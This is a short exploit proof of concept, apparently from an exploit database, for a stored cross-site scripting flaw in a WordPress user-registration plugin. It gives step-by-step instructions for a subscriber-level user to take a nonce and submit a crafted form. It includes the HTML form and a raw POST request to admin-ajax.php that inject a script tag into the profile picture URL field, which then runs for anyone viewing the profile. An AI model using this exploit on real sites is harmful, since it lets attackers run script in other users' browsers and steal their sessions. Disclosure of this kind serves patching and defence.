## https://sploitus.com/exploit?id=WPEX-ID:5C7A9473-D32E-47D6-9F8E-15B96FE758F2
1. Login as any user (such as subscriber) and go to the edit profile page (the one generated by the plugin).
2. View the page source and get json var nonce "user_registration_profile_details_save"
3. Add the below form to the page and and replace the security nonce with the one from step 2, then submit it.
4. View the profile page (as any user) to trigger the XSS.
<form action="/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="user_registration_update_profile_details"><br>
<input type="text" name="security" value="143544a1fb"><br>
<input type="text" name="form_data" value='{"user_registration_profile_pic_url":{"field_name":"user_registration_profile_pic_url","value":"\"><script>alert(1)<\/script>"}}'><br><br>
<input type="submit" value="Submit">
</form>
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
Connection: close
Cookie: [your cookies, as any user]
Upgrade-Insecure-Requests: 1
action=user_registration_update_profile_details&security=143544a1fb&form_data=%7B%22user_registration_profile_pic_url%22%3A%7B%22field_name%22%3A%22user_registration_profile_pic_url%22%2C%22value%22%3A%22%5C%22%3E%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E%22%7D%7D